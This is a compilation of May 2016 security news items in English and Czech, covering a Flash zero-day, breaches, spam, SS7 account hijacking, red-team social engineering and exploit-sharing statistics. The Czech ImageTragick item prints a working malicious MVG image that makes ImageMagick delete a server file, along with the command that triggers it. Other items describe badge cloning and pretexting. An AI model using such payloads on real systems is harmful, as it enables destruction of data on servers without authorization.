“When it comes to cyber-attacks, few groups are as notorious as North Korea’s Bureau 121, which has operated since the late nineties. Most security researchers agree that the group operates out of China. Specifically, in the basement of a restaurant, rated highly on TripAdvisor for its tremendous Korean food.” reported the BBC.
North Korea has the highest percentage of military personnel in relation to population, it has approximately 40 enlisted soldiers per 1000 people with a considerable impact on the budget of the country.
CVE-2016-4117 Adobe Flash Zero-Day is being exploited in the wild
11.5.2016 Vulnerebility
CVE-2016-4117 is a zero-day vulnerability affecting the Adobe Flash Player that is being exploited to launch malware-based attacks in the wild.
According to Adobe, a new zero-day vulnerability in the Flash Player software is being exploited in cyber attacks in the wild, and the worrisome new is that it will not be patched until May 12th. The security vulnerability (CVE-2016-4117) affects Windows, Mac OS X, Linux and Chrome OS.
Adobe rated critical the vulnerability discovered by the security expert Genwei Jiang from FireEye, which also confirmed that it is being used in targeted attacks.
“A critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.” reads the advisory published by Adobe. “Adobe is aware of a report that an exploit for CVE-2016-4117 exists in the wild. Adobe will address this vulnerability in our monthly security update, which will be available as early as May 12. For the latest information, users may monitor the Adobe Product Security Incident Response Team blog.” The Adobe Product Security Incident Response Team also reported the availability of a patch for three flaws (CVE-2016-1113, CVE-2016-1114, CVE-2016-1115) in the ColdFusion application server platform.
The company also issued updates for the Adobe Acrobat and Adobe Reader product lines.
Top 4 Data Breaches reported in last 24 Hours
10.5.2016 Safety
There is no doubt that data breaches are on the rise. Hardly a day goes without headlines about any significant data breach.
According to the latest ‘Cyber Security Breaches Survey 2016’ report published by UK government, two-thirds of the biggest firm in the UK have experienced at least a cyber attacks or data breaches within the past 12 months.
Here’s today, I am writing about top 4 data breaches reported in last 24 hours, threatened your data privacy and online security.
1. Kiddicare Hacked! 794,000 Accounts Leaked
Kiddicare has admitted that the company has suffered a data breach, which led to the theft of sensitive data belonging to 794,000 users, including phone numbers and residential addresses.
Kiddicare, company that sells child toys and accessories across the United Kingdom, became aware of the data breach after its customers started receiving suspicious text messages – most likely part of a phishing campaign – that attempted to pilfer them to click on a link that takes them for an online survey.
Although the company assured its customers that no banking or financial detail have been compromised in the breach, personal information belonging to nearly 794,000 customers, including their names, delivery addresses, email addresses and telephone numbers, have been exposed.
2. UserVoice Hacked! Users’ Accounts Breached
Today morning, I received an email from UserVoice, a web-based service that offers customer service and helpdesk tools, notifying that the company suffered a data breach and some user accounts were compromised, including their names, email addresses, and passwords.
The company admitted that user passwords were protected with the SHA1 hashing algorithm, which is considered as a weak encryption.
"Despite the fact that the passwords were encrypted, it is very possible that an attacker can decrypt this information," the company notified. “As a precautionary measure, we have reset all UserVoice passwords to prevent any chance of the attacker gaining further access to accounts.”
Some famous companies are using customer service tools from UserVoice, including Twitch, Microsoft and more.
3. Google Suffers Insider Data Breach
Google suffered a minor data breach after a vendor unintentionally leaked sensitive information about its undisclosed number of employees to the wrong email address — but luckily, the person who received it deleted the email straight away.
According to report, the data breach happened after an employee at a third-party company that Google uses for its staff benefit management service mistakenly sent personal data to another company.
Google is still investigating the insider data breach that leaked the personal details of Google employees apparently included Social Security Numbers (SSNs) and names, but no details on benefits or family members.
4. London Clinic fined £180,000 for Leaking HIV Patients Data
The Information Commissioner's Office (ICO) has imposed a £180,000 (about $260,000) fine to a London-based HIV clinic run by Chelsea and Westminster Hospital National Health Service (NHS) Foundation Trust, for leaking data of 781 HIV patients
The clinic mistakenly sent a newsletter email containing sensitive medical information relating to a total 781 HIV patients together rather than individually, using ‘bcc’ field in the email, leaking their names and email addresses to one another.
"People’s use of a specialist service at a sexual health clinic is clearly sensitive personal data," Information Commissioner Christopher Graham said. "The law demands this type of information is handled with particular care following clear rules, and put simply, this did not happen."
The Clinic's medical director said:
"We fully accept the ruling of the ICO for what was a serious breach, and we have worked to ensure that it can never happen again."
Euro 2016 – Experts already detected football-themed spam
10.5.2016 Spam
The Euro 2016 will be held in June in France and online fraudsters already started launching football-themed spam campaigns on the event.
Major events such as the Euro 2016 represent a great opportunity for criminal organizations. In conjunction with international football tournaments such as the World Cup and the European Championship, traditionally security experts observe a spike in spammer activities.
The Euro 2016 will be held in June in France, and online fraudsters started launching spam campaigns that rely on fake notifications about lottery wins dedicated to the upcoming football tournament.
Security experts from Kaspersky are warning Internet users about malicious spam campaign spreading messages containing attachments adorned with graphic elements including logos of the next Euro 2016 and its sponsors.
“The contents of the attachments are the standard stuff: the lottery was held by an authorized organization, the recipient’s address was randomly selected from a large number of email addresses, and in order to claim your prize you have to reply to the email and provide some personal information.” reads a blog post published by Kaspersky in SecureList.”We have recorded cases where the same attachment was sent in messages with a different text, but the theme of the email is essentially the same.”
The experts noticed that crooks behind the spam campaign used multiple email addresses and different addresses in the body of the message. Kaspersky also observed advertising spam in different languages asking targeted people to buy a 2-euro commemorative coin.
The experts expect to see a significant growth in Euro 2016 themed spam in the next weeks, and unfortunately, this kind of attacks could be very effective.
“This type of fraudulent spam can be one of the most dangerous for users: the perpetrators are unlikely to limit their activity to fake lotteries, and will start spreading various emails offering the chance to win tickets to the games, as was the case before the World Cup in Brazil. The amount of spam targeting users in France, which is hosting the championship, may also increase.” continues the post.
Nebezpečný spam terorizuje už i uživatele Skypu
10.5.2016 Spam
Škodlivé odkazy na nejrůznější viry a trojské koně jsou dnes již běžně šířeny přes e-maily a sociální sítě. Nově se je počítačoví piráti snaží uživatelům podstrčit také v komunikačním programu Skype. Před novou hrozbou varovala bezpečnostní společnost Malwarebytes Labs.
Komunikační program Skype
Útok má prakticky vždy stejný scénář. Kyberzločinci se nejprve nabourají do cizího počítače, kde získají přístup ke Skypu. Z něho poté rozesílají prakticky všem možným kontaktům nevyžádané zprávy s odkazem na podvodné stránky. Ten je zpravidla ještě doplněn informací, že se jedná o zábavné fotografie či nějaké pikantní video.
Z řádků výše je patrné, že tyto spamové zprávy mohou přijít od skutečných kontaktů, které lidé znají. Ani v takovém případě by se neměli nechat napálit, na odkaz nesmějí v žádném případě klikat.
Pokud to udělají, budou přesměrováni na podvodný web, kde na ně číhá škodlivý kód. Stačí kliknout na jakoukoliv část internetové stránky a na uživatele prakticky okamžitě vyskočí hláška o nutnosti instalace nějakého programu.
Šířit mohou prakticky jakýkoliv virus
To počítačoví piráti ospravedlňují zpravidla tak, že bez příslušného programu nepůjde video na podvodném webu přehrát. Instalací tohoto programu si samozřejmě uživatelé nevědomky pustí do svého systému nezvaného návštěvníka.
Přes odkazy ve Skypu mohou kyberzločinci šířit prakticky jakékoliv škodlivé kódy. Mohou tak snadno odposlouchávat komunikaci na cizím počítači nebo například vybílit jejich bankovní účet. Hrozbu se tedy rozhodně nevyplatí podceňovat.
Je však nutné zmínit, že podobné praktiky zkoušejí počítačoví piráti hlavně v Indii, Japonsku a na Filipínách. To samozřejmě ale neznamená, že by nevyžádané zprávy na Skypu nemohli v nadcházejících dnech obdržet i tuzemští uživatelé.
Populární linuxový ImageMagick je děravý jako ementál. Drobným hackem jsme smazali soubory
10.5.2016 Zdroj: Zive.cz Zranitelnosti
Hromada webových služeb běžících na linuxovém serveru používá k operacím s obrázky nástroje z balíku ImageMagick. Ty mohou třeba ořezávat a generovat fotografie, provádět jejich konverzi mezi formáty aj. Takovým typickým příkladem použití by mohla být třeba práce s úpravou profilové fotografie uživatele na nějakém webu.
ImageMagick je rychlý a mocný, nabízí totiž obrovské množství konverzních funkcí včetně generování animovaných gifů aj. Jenže kvůli této komplexnosti obsahuje také hromadu kritických chyb (CVE-2016-3714), na které nyní upozornil třeba docela adekvátně pojmenovaný web ImageTragick.
Díky těmto zranitelnostem lze poměrně snadno zneužít konverzní funkce ImageMagicku k nejrůznějším operacím v systému. Pokud například ImageMagick dostane za úkol převést grafiku ve formátu SVG, MVG aj. do něčeho jiného – třeba do rastru PNG, může vstupní soubor obsahovat příkazy, které povedou ke smazání nějakého souboru (pokud na to bude mít ImageMagick práva), ke spuštění příkazu, zavolání HTTP GET, stažení zákeřného kódu z webu aj.
Okamžitě po zveřejnění tedy hackeři vytvořili zákeřné obrázky, které zkoušejí nahrávat na nejrůznější weby, které pracují s grafikou a ví se, že používají ImageMagick. Některé velké hostingové/CDN systémy jako třeba CloudFlare a další už na tyto útoky pamatují ve svých firewallech.
Příklad útoku pomocí zákeřného obrázku
Jak může být takový útok snadný, ukážeme v příkladu níže.
Nejprve si vytvořím zákeřný soubor smazat.mvg v textovém formátu MVG (Magick Vector Graphics):
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/pokus.txt'
popgraphic-context
Soubor obsahuje textové instrukce k vytvoření plátna o velikost 640×480 pixelů, na které se má vykreslit na pozici 0;0 obrázek ze souboru /tmp/pokus.txt. Před adresou souboru je ale klíčové slovo ephemeral, které ImageMagicku říká, aby tento soubor poté smazal.
Problém spočívá v tom, že se vůbec nejedná o obrázek, ale že to může být vlastně jakýkoliv soubor, k jehož smazání bude mít proces ImageMagicku právo.
Pokud bych takový soubor poté nahrál na nějakou službu s ImageMagickem, který se na serveru pokusí o konverzi do nějakého jednotného formátu, třeba PNG, provedl by podobnou operaci takto:
convert smazat.mvg smazat.png
V rámci zpracovávání souboru smazat.mvg by pak ImageMagick smazal soubor /tmp/smazat.txt
ImageMagick je velmi snadno zneužitelný k nekalým operacím
Další příklady primitivních a o to nejbezpečnějších útoků najdete na webu ImageTragick, který zároveň nabízí rady, jak balík aktuálně co nejlépe zabezpečit.
FCC takes initiative to Speed Up Mobile Security Updates
10.5.2016 Mobil
The Smartphone users are fed up with slow security updates, so two United States federal agencies have launched an official inquiry to know how manufacturers and carriers deal with mobile phone security updates and what they are doing to roll out patches as quickly as possible.
The Smartphone patch update mechanism is broken, and someone has to fix it.
Most smartphone models are not receiving available security patches, and the risk of vulnerabilities, malware infections, and data loss are leaving consumers vulnerable to attacks and putting businesses and corporate networks at risk.
The United States federal regulators want to know how and when mobile phone manufacturers and cell phone carriers release security updates to assure its users' security, amid mounting concerns over security vulnerabilities.
The Federal Communications Commission (FCC) in partnership with the Federal Trade Commission (FTC) have launched its own, parallel inquiry into mobile device security updates.
On Monday, the FTC ordered eight mobile phone manufacturers to answer few questions on how they handle security updates to address vulnerabilities in smartphones, tablets, and other mobile devices.
The mobile phone makers include Apple, Samsung, Google, Microsoft, Blackberry, HTC, Motorola, and LG.
Meanwhile, the FCC sent a letter to six mobile carriers – including AT&T, Sprint, and Verizon – "to better understand the role that they play in ensuring the security of mobile devices."
The FCC is concerned about so much delays in delivering security updates to affected devices and that "older devices may never be patched."
Here's what the FCC wrote in its Press release:
"As our nation's consumers and businesses turn to mobile broadband to conduct ever more of their daily activities, from the most sensitive to the most trivial, the safety and security and their communications and other personal information is directly related to the security of the devices they use."
"There have recently been a growing number of vulnerabilities associated with mobile operating systems that threaten the security and integrity of a user’s device and all the personal, sensitive data on it."
The FCC asked the cellphone carriers about how they handle the rollouts of vulnerability patches, what hurdles they face in getting security updates to their users, what is the current rollouts process, and how do they notify customers about security flaws.
The FCC also requested Stagefright-specific data to know how the carriers became aware of the security flaw and how many of their customers' devices were affected by it.
Moreover, the agency asked carriers on whether the monthly security updates promised by Google, LG and Samsung are actually happening.
The FTC want mobile phone makers to detail:
The factors they consider in deciding whether to patch a flaw on a particular mobile device.
The details of the data on the particular mobile devices they have offered for sale to consumers since August 2013.
The security vulnerabilities that have affected those mobile devices.
Whether and when the company patched such security flaws.
The mobile phone makers and cellphone carriers are asked to respond to the questions within 45 days.
Mobile phone makers and cellphone carriers often aren't very interested in updating older devices, as they don't want to put much work into updating an older device and also want to encourage their customers to buy newer devices.
This leaves older models in an insecure state without any patch forthcoming.
So, this new move by the federal regulators would help the majority of phone users in the world who are running old, out-of-date, and potentially harmful software.
Hackers Crack Businesses’ Security Using Social Engineering
10.5.2016 Hacking
A group of white hackers from RedTeam traveled to the Midwest to test the systems of a major power company and breach it with Social Engineering.
RedTeam Security is a group of ethical hackers who specialize in offensive security, believing that the best defense is a good offense. Engaging in social engineering, in addition to penetration testing, RedTeam tests the effectiveness of a business’s security controls before hackers have the opportunity to do so.
Social engineering is the act of manipulating people into relinquishing confidential information. Webroot explains that, “criminals use social engineering tactics because it is usually easier to exploit your natural inclination to trust than it is to discover ways to hack your software. For example, it is much easier to fool someone into giving you their password than it is for you to try hacking their password (unless the password is really weak).”
According to Paul Szoldra, writing for Tech Insider:
“‘Social engineering is also referred to as people hacking,’ says Jeremiah Talamantes, president and founder of RedTeam Security. Though social engineering over the phone is less risky, in-person contact can be rather fruitful as RedTeam’s efforts showed. The team was hired to test the physical and virtual security of eight different locations and they gained useful information, or in one case, full access, just through this method.”
Source Tech Insider
Szoldra recently made his way to the Midwest to shadow the RedTeam Security professionals as they tested the security of a major power company, using social engineering.
Pretending to be The IT Guy – RedTeam’s first test involved an attempt to gain access to the network server room at one of the company’s branches. If that could be accomplished, the next step would be to install hardware that called back to them over the internet. Alternatively, they could simply take over workstations in the building.
RedTeam director Ryan Manship emphasizes the important role that confidence plays in the successful outcome of a mission such as this. Presenting yourself with the right pretext–having a legitimate reason for being where you are–is critical, according to Manship.
As it turns out, he wasn’t even asked for ID. The secretary accepted Manship’s fabrication, which cleverly included the first name of one of the company’s network administrators.
A supervisor, however, found the carefully crafted story a bit suspect and did ask for identification. Manship claimed to not have his ID on him. At that point, according to Szoldra, the supervisor, “made a phone call to an IT manager — the person who actually hired Manship and RedTeam to test them — and handed him the phone. The jig was up.”
Two College Students With a Big Project – The second attempt at social engineering was more successful. RedTeam had come up with a plan to shoot video and photos inside an office location in order to become familiar with the environment. They also wanted to try to retrieve data from an employee RFID badge that would unlock office doors. Ideally, a door to a server room could be unlocked. Just the day before, RedTeam consultant Kurt Muhl contacted the office pretending to be a college student from a technical college. He explained that he was working on a class project on renewable energy and was interested in interviewing someone. Muhl got a call back and was able to set up an appointment for the next day. This second endeavor went off without a hitch.
Szoldra writes that, “it was all smoke and mirrors, of course; a way for Muhl to build rapport so he could get what he really came for: Bill’s access badge.
Muhl brought along what looked like a laptop case to carry his notepad, but what was really inside the black bag was a device to scan anyone’s RFID badge who happened to come within two to three feet of it and store it in memory, so the hacker team could clone it for later use.”
Patrick Engebretson, author of The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy illuminates the preparation needed in order to pull feats like this off: “If I had to chop down a tree, I’d spend the first four of them sharpening my axe.”
Researchers hack WhatsApp accounts through SS7 protocol
10.5.2016 Hacking
White Hackers from Positive Technologies demonstrate how to exploit SS7 protocol to impersonate WhatsApp and Telegram users and act on their behalf.
Both WhatsApp and Telegram messaging services have implemented the end-to-end encryption for chats in order to protect the privacy of their users and improve their security.
Is it enough to keep prying eyes far from them?
No, according to a recent research conducted by Positive Technologies, hackers can impersonate victims and reply to both WhatsApp and Telegram chat messages.
Hackers can exploit the Signaling System 7, aka SS7, which is a set of protocols developed in 1975 that allows the connections of one mobile phone network to another. The information passed from a network to another are needed for routing calls and text messages between several networks.
The SS7 performs out-of-band signaling in support of the call establishment, billing, routing, and information exchange functions of the public switched telephone network (PSTN).
Experts from Positive Technologies discovered that hackers can exploit a flaw in the SS7 protocol to steal the victim’s identity on the messaging services with just basic skills.
The principal instant messaging services, including WhatsApp and Telegram, rely on the SMS authentication as the primary security verification mechanism, which is routed through SS7 signalling. This means that hackers exploit the SS7 to compromise the verification mechanism and take over the victim’s account and impersonate him.
As explained by the experts, the most worrisome aspect of the story is that hacker does not need high-skills or a sophisticated equipment for such attack.
The hackers from the Positive Technologies used a common Linux distro and a publicly available SDK for their tests.
“An intruder doesn’t need sophisticated equipment. Positive Technologies used a popular Linux based computer and a publicly available SDK for generating SS7 packets. + After performing an initial attack using SS7 commands, the intruder is able to execute additional attacks using the same methods.” states the paper from Positive Technologies (at the time I’m writing the main company website is down, I found it on the .ru website). “For instance, if an intruder manages to determine a subscriber’s location, only one further step is required to intercept SMS messages, commit fraud, etc. + Attacks are based on legitimate SS7 messages. Therefore, you cannot simply filter messages as it may have a negative impact on the overall quality of service”
Attacks relying on SS7 vulnerabilities could have serious consequences, many threat actors could exploit flaws in the signalling protocol to determining subscriber location, tapping calls, intercepting SMS, disrupt communication services … and takeover instant messaging accounts.
“If telecom and network operators protect their core telecom networks, it will improve the security of customers, but that’s not going to happen over night. Service providers such as WhatsApp need to consider introducing additional mechanisms to verify the identity of users to stay secure,” said Alex Mathews, technical manager EMEA of Positive Technologies.
Trojský kůň krade v mobilech informace o kreditních kartách. Útočí i v Česku
10.5.2016 Viry
Národní bezpečnostní tým CSIRT.CZ varoval v úterý před novým trojským koněm, který krade informace o platebních kartách. Zaměřuje se přitom výhradně na chytré telefony s operačním systémem Android. V ohrožení jsou i čeští uživatelé.
„Česká republika je na seznamu čtyř zemí, jejichž uživatelé OS Android byli v průběhu uplynulých měsíců nejvíce infikováni trojským koněm, který umožňuje získat administrátorská práva a veškeré informace o zařízení posílat na server,“ uvedl Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.
Podle něj mohou útočníci snadno získat i informace o platebních kartách. „Při zadání příkazu je tento malware schopen zobrazit falešné okno, které vypadá jako okno aplikace Google Play (oficiální internetový obchod s programy Googlu, pozn. red.) a požadovat informace o kreditní kartě,“ konstatoval Bašta.
Touto cestou mohou celkem snadno připravit počítačoví piráti důvěřivce o peníze.
Hrozba je o to závažnější, že na chytrých telefonech a tabletech nepoužívá většina lidí žádný bezpečnostní software. „Uživatelé tohoto operačního systému by na svých zařízeních určitě měli mít instalovaný anti-malware a dělat pravidelné zálohy,“ podotkl bezpečnostní analytik CSIRT.CZ.
Škodlivých kódů pro mobily přibývá
Nárůst mobilních hrozeb je v posledních měsících stále patrnější. „V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval,“ podotkl David Řeháček, bezpečnostní odborník ze společnosti Check Point.
Podle něj dělá bezpečnostním expertům v současnosti velké vrásky na čele především hrozba zvaná HummingBad.
HummingBad se může šířit jako příloha nevyžádaného e-mailu, stejně tak ale může číhat na podvodných webech. Na smartphonech s operačním systémem Android vytváří trvalý rootkit, může se tedy v zařízení maskovat, což velmi znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit.
Researcher arrested and charged for hacking elections websites
10.5.2016 Hacking
The security expert David Levin was arrested and charged after discovering serious security flaws on a couple of election websites in Florida.
The security researcher David Levin, the owner of Vanguard Cybersecurity, was arrested and charged after discovering serious security flaws on a couple of elections websites in Florida.
In December Levin discovered that the elections website of Lee County was affected by an SQL injection vulnerability that allowed access to credentials stored in plain text. The expert also analyzed the Florida Division of Elections website discovering security vulnerabilities.
At this point, the researcher reported the issue to a supervisor of elections candidate, in January he made a video PoC of the SQL injection flaw that allowed him to access the credentials stored in the back-end of the elections website and then reported the issue to the Supervisor of Elections Office.
Unfortunately, the authorities arrested David Levin of Estero for unauthorized access of Lee County and state elections websites. He was released on a $15,000 bond after a few hours.
“The Florida Department of Law Enforcementaccused the 31-year-old Estero man of hacking into the state elections website Jan. 4 and Jan. 31. He hacked into the Lee County elections website Dec. 19.” reads the news-press.com website.
The Florida Department of Law Enforcement confirmed that the expert exploited on a SQL Injection flaw in order to compromise the election website.
He hacked into the state elections website two times in January and one into the Lee County elections site in December.
“An SQL (Structured Query Language) is a code injection technique used to attack data-driven applications. An SQL injection enables an individual to obtain secure information, such as usernames and passwords, from vulnerable sources.”
Levin was released by the police on a $15,000 bond after a few hours.
It is hilarious, Levin thought he was doing the right thing, but authorities had a different opinion about his activities.
Twitter closes the access to the Intel Agencies to Analysis Service
10.5.2016 BigBrothers
Twitter has blocked the US intelligence agencies from accessing a service that allows the real-time analysis of the content posted online.
According to The Wall Street Journal, that cited a senior US intelligence official, Twitter has blocked US intelligence agencies from accessing a service that analyzes the content posted online through the social media platform in real time.
“Twitter Inc. cut off U.S. intelligence agencies from access to a service that sifts through the entire output of its social-media postings, the latest example of tension between Silicon Valley and the federal government over terrorism and privacy.” states the The Wall Street Journal.
The social media giant owns about a five percent stake in Dataminr which is the unique service allowed to access the real-time stream of public tweets.
Twitter is banning third-party companies from selling data to intelligence agencies for surveillance. After a pilot programme conducted by In-Q-Tel now ended, the company told Dataminr that it will stop providing the service to the US Government. Dataminr has a $225,000 contract to provide its service to the Department of Homeland Security.
Dataminr implements a real time engine for the analysis of Tweets and the discovery of patterns among the content published online through the social media platform. This kind of information is precious in the analysis of any kind of threat actors and event, especially for investigations of terrorist organizations.
Twitter's IPO Filing Implies $12.8 Billion Value Amid Growth
The decision was not publicly announced by Twitter, but recently executives at Dataminr confirmed the Twitter’s intention to stop providing the service to the intelligence agencies.
“data is largely public and the US government may review public accounts on its own, like any user could.” Twitter told The Wall Street Journal in a statement-
“Dataminr uses public Tweets to sell breaking news alerts to media organizations such as CNN and government agencies such as the World Health Organization, for non-surveillance purposes,” Twitter told IBTimes UK. “We have never authorized Dataminr or any third party to sell data to a government or intelligence agency for surveillance purposes. This is a longstanding policy, not a new development.”
What will happen in the future? Dataminr will continue to provide its services to the financial industry, news media and other clients outside the intelligence
Dataminr will continue offering its services to its clients outside the intelligence community.
Part of the security community believe that the Twitter’s decision is aligned with current policies of IT giants that intend to protect users’ privacy avoiding the interference of the intelligence agencies.
Right? Wrong? … posterity will judge.
The hidden information behind 12,000 PoC Exploits shared online
9.5.2016 Exploit
A study conducted by Recorded Future on PoC exploits shared online over the last year shows that social media is the main distribution channel.
Security experts at the threat intelligence firm Recorded Future have conducted an interesting study on the proof-of-concept exploits shared online (e.g. On Twitter, on forum linking to personal blogs, GitHub, or Pastebin) last year.
The PoC exploits are developed by threat actors and security experts to demonstrate the existence of s security flaw into a target system and how to exploit it.
In some cases, hackers publicly disclose PoC exploits to force a company to develop a patch to fix critical flaws in their products.
The research allowed the discovery of roughly 12,000 references to PoC exploits shared online since March 22, 2015, an amazing data is we consider that it represents a near 200 percent increase compared to the previous year.
According to the report, the majority of PoC exploits were spread via social media networks (97 percent of cases), mainly via Twitter, followed by Code Repositories (1.8 percent of cases). The choice is not casual, social media allow users to reach a wider audience instantly.
“Our research shows that POCs are disseminated primarily via Twitter, with users flagging POCs to view externally in a range of sources — code repositories (GitHub), paste sites (Pastebin), social media (Facebook and Reddit surprisingly), and deep web forums (Chinese and Spanish forums).” states the study.
SOURCE COUNT RATE
Social Media 11,549 97%
Code Repository 215 1.8%
Mainstream 42 0.35%
None 33 0.28%
Niche 26 0.22%
Blog 22 0.18%
Forum 11 0.09%
Exchange 4 0.03%
Malware/Vulnerability Technical Reporting 2 0.02%
Paste Site 2 0.02%
Which are the targets of the POC exploits?
Most targeted technologies are Android (35,8), DNS (23,2), SSH (20,3). The products being targeted are Android phones, Microsoft Windows 7 and 8, Microsoft Internet Explorer, Linux, GNU C Library (glibc), and Firefox.
Giving a look to the list of the most widely distributed PoC we can observe that the CVE-2015-7547 buffer overflow flaw is the one with the greatest number of PoC exploits. The flaw affects the GNU C Library and could be exploited by hackers to trigger a buffer overflow through malicious DNS response.
Other PoC exploits shared online are related to the CVE-2015-1635 and the CVE-2016-0051 in Microsoft Windows Server, and the CVE-2015-3456, aka the VENOM flaw, in the
The analysis of the top 10 vulnerabilities discussed around POCs suggests a huge focus on Linux boxes and Microsoft Windows Servers, clearly due to their diffusion.
“According to open source intelligence (OSINT) collections by Recorded Future, here are some of the most linked to POCs over the last year:”
CVE-2015-3456 (Venom): https://marc.info/?l=oss-security&m=143155206320935&w=2
CVE-2015-2370 / MS15-076: https://www.exploit-db.com/exploits/37768/
CVE-2016-0051: https://github.com/koczkatamas/CVE-2016-0051
CVE-2015-1635 / MS15-034: http://pastebin.com/raw/ypURDPc4
“Researchers and malicious actors focus their time on developing POCs for Web servers/services and consumer products in the Microsoft Office suite, Microsoft IE, etc. These are used across the commercial, consumer, and government sector widely,” explained Nick Espinoza from Recorded Future.
Největší hackerský útok se patrně nekonal. Šlo o podvod
9.5.2016 Podvod
Na konci minulého týdne obletěla svět zpráva, že ruský počítačový pirát se snaží prostřednictvím internetu rozprodat přinejmenším 272 miliónů přihlašovacích údajů k e-mailovým schránkám různých poskytovatelů. Dotčené společnosti však tvrdí, že o největší hackerský útok nejde ani náhodou – šlo prý jednoduše o podvod.
Únik bezmála tří stovek miliónů hesel se měl týkat především služeb Hotmail, Yahoo Mail, Gmail a Mail.ru.
Provozovatelé posledních tří jmenovaných služeb se již podle serveru Cnet nechali slyšet, že se uživatelé nemají čeho obávat. Většina zveřejněných dat podle nich totiž není platná, tedy že k uváděným e-mailům daná hesla vůbec nepatří.
Tak velký únik je nesmysl
Troy Hunt, bezpečnostní výzkumník společnosti Microsoft, celý hackerský útok označuje na svých webových stránkách věnovaných z velké části bezpečnosti na síti jednoduše za podvod.
Podle něj je velmi nepravděpodobné, že by takové množství hesel mohlo uniknout. A pokud by se tak skutečně stalo, šlo by o databázi v zašifrované podobně – ruský hacker přezdívaný Collector (Sběratel) je přitom nabízel nezašifrovaná.
Otazníky budil údajně největší hackerský útok prakticky hned po svém odhalení. Bezpečnostní výzkumníci upozorňovali na to, že takové množství údajů nemohl jeden člověk nasbírat sám. Tehdy se nabízela myšlenka, že Collector velkou část hesel pouze posbíral z jiných útoků svých kolegů.
Byl e-mail v minulosti napaden?
Uživatelé dotčených e-mailových služeb se tak podle všeho nemají čeho obávat. Zda nebyl jejich e-mailový účet v minulosti – tedy nejen při největším hackerském útoku – napaden, si mohou ověřit například na stránkách haveibeenpwned.com.
Na nich stačí vyplnit pouze svůj e-mail, který se následně porovnává s databází ukradených hesel. Pokud je v nich uživatelský e-mail objeven, je uživatel vyzván ke změně hesla. Databáze se neustále aktualizuje a obsahuje údaje i z jiných hackerských útoků.
Samozřejmě tato metoda ověření není stoprocentní. Pokud bezpečnostní experti nezvládli ještě odcizená hesla zpracovat, v databázi se e-mailová schránka neobjeví.
2015 intelligence transparency report, the surveillance is still nosey
9.5.2016 BigBrothers
According to 2015 intelligence transparency report, the searches of US citizens made by the NSA and CIA intelligence agencies have almost doubled since 2013
If you believe that the Snowden‘s revelations have stopped or limited the surveillance activities you are obviously wrong. The diffusion of the technology and the increasing threats of espionage and terrorism is approached by the intelligence with a significant intensification of monitoring activities.
According to 2015 transparency report regarding the use of National Security Authorities, the US intelligence has ramped up searches of US citizens’ data.
The US intelligence agencies access information stored in a database that is fed with the data gathered by the surveillance machine managed by the NSA. Edward Snowden has leaked online documents related to powerful surveillance platforms like the XKeyScore that is considered the “widest-reaching” architecture for developing intelligence from the internet.
Going deep in the report is it possible to discover that the number of surveillance queries concerning known US citizens is 4,672, almost double respect the same number declare in the 2013 transparent report.
The above number related to the surveillance queries include the requests made by Intelligence Agencies, like the NSA and CIA, but doesn’t include the FBI that has no access to the database.
The intelligence transparency report also refers more than 48,000 targets of National Security Letters, a National Security Letters (NSL) is defined as “a request for information that the Federal Bureau of Investigation (FBI) can make when they or other agencies in the Executive Branch of the U.S. government are conducting national security investigations. An NSL can’t be used in ordinary criminal, civil or administrative matters.”
The agencies query the database without a warrant as specified in section 702 of FISA ( “Procedures for Targeting Certain Persons Outside the United States Other Than United States Persons”).
The section highlights that “The government may not target any U.S. person anywhere in the world under this authority, nor may it target a person outside of the U.S. if the purpose is to acquire information from a particular, known person inside the U.S.”
“Section 702 only permits the targeting of non-U.S. persons reasonably believed to be located outside the United States to acquire foreign intelligence information. Such targets, however, may on occasion communicate information of or about U.S. persons. Where appropriate, NSA may disseminate such information concerning U.S. persons. ” clarifies the report.
The 4,672 cases cited in the transparency report demonstrate that the US intelligence has gathered and accessed data of US citizens without any warrant. You have also to consider that the NSA and the CIA theoretically don’t cover internal surveillance activities.
The report also identifies more than 48,000 targets of National Security Letters, a common business request that has also been criticized as unconstitutional.
How to Use Apple's iMessage on Android Phone
9.5.2016 Android
If you wish to send iMessages from your Android smartphone to a friend who owns an iPhone, it's possible now, at least for those who own MacBooks and iMacs.
A developer has come up with a smart solution to bring Apple's iPhone messaging platform to Android phones. Though the solution is not practical for most people, technical people and nerds can use it to send end-to-end encrypted iMessages.
The solution is a smart hack, but the best part is: PieMessage totally works.
Developed by Eric Chee, PieMessage needs an OS X client as a server to route messages to an Android device, enabling iMessage support on Android devices. So, it's the Mac that handles the entire workload.
"Basically, what the Android client does is send the text to a MacBook," Chee said. "And uses the Mac's Messages app to send off the notification. When the Mac detects an incoming message, it will pass it back to the Android. So yes, there is both software you need to run on a Mac and Android. I have an old 2007 MacBook that is just always on connected at home that serves as its client…"
Here's How PieMessage Works:
PieMessage uses an AppleScript to capture iMessages as they arrive on your Mac system.
A Java app scoops up those messages from the script.
Then the Java app forwards them to a custom messaging app on an Android phone to display and respond to those iMessages.
Chee has also presented a proof-of-concept video demonstration that shows the PieMessage app in work.
He also released the PieMessage code open source on GitHub.
There are some limitations to PieMessage:
You can reply to one-to-one messages from your Android device but currently can't send group messages; instead you can just receive them.
Also, you can not send images and can not see when someone is typing — though the author plans to add more functionality in future updates.
Currently, PieMessage identifies different iMessage conversations by phone numbers or email addresses instead of names.
Since Apple could block this type of functionality in the future due to security risks to its platform, there are other good alternatives for sending and receiving end-to-end encrypted messages, like WhatsApp and Facebook Messenger, with cross-platform support.
Hackers can break into a facility by spending $700 on Amazon or eBay
9.5.2016 Hacking
Hackers demonstrated to the Tech Insider how to break into any office by purchasing from Amazon and eBay $700 worth of electronic parts to clone access cards.Breaking into a company could be very easy and cheap for hackers, it could be sufficient to buy from Amazon and eBay $700 worth of parts. “We watched a team of hackers ‘fully compromise’ a power company in less than 24 hours” reads the Tech Insider.
